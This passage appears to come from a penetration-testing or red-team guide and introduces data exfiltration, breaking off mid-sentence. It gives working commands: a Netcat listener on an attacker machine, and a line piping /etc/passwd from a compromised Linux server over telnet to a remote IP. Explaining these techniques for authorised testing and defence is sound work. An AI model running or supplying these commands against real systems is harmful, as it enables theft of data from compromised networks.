Exfiltration of data
The extrusion of data from any environment in an unauthorized way from a computer is referred as exfiltration of data. Once the persistence is maintained on the compromised system, depending on whether the goal set during the beginning of the Red Teaming Exercise or penetration testing was to exfiltrate the company secrets and demonstrate, the following set of tools can be utilized to exfiltrate data from highly secured environments. In this section, we will explore different methods that attackers would utilize to send files from internal networks to attacker controlled systems.
Using existing system services (Telnet, RDP, and VNC)
Now we will discuss some of the easy techniques to quick grab the files in case of time-based access to compromised systems. Attackers can simply open up a port using Netcat by running nc -lvp 2323 >Exfilteredfileand then run the following command from the compromised Linux server:cat /etc/passwd | telnet remoteIP 2323. This will display...
